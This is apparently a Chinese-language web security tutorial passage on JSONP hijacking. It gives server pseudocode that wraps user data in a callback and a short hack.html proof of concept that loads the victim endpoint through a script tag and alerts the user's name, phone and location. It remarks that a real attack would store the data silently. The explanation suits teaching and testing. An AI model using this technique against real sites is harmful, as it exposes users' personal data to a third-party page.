http://www.xxx.com/xxx.do?callback=info
参数名也常见有cb jsoncb call jsoncall cback等
http://www.xxx.com/xxx.do 服务器伪代码:
//获取callback的值$name=$_GET["callback"];//校验用户身份信息,从数据库获取用户信息$result=查库并返回结果//返回信息$name+"("+$result+")"//放到实际例子就是这样的info({"name":"Jack","phone":"18888888888","location":"NanJin"})
info({"name":"Jack","phone":"18888888888","location":"NanJin"})
{"name":"Jack","phone":"18888888888","location":"NanJin"}
执行info() 函数 ,{"name":"Jack","phone":"18888888888","location":"NanJin"}作为入参
包含以下代码
<script>function info(data){alert(JSON.stringify(data)); }</script><script src="http://www.xxx.com/xxx.do?callback=info"></script>
script标签的src属性可以跨域引入脚本,因此hack.html引入js后相当于:
<script>function info(data){ alert(JSON.stringify(data)); }info({"name":"Jack","phone":"18888888888","location":"NanJin"})</script>
弹出用户信息,即可证明该页面可以跨域操作用户敏感数据;实际攻击中,不会弹窗,而是会偷偷把数据存起来~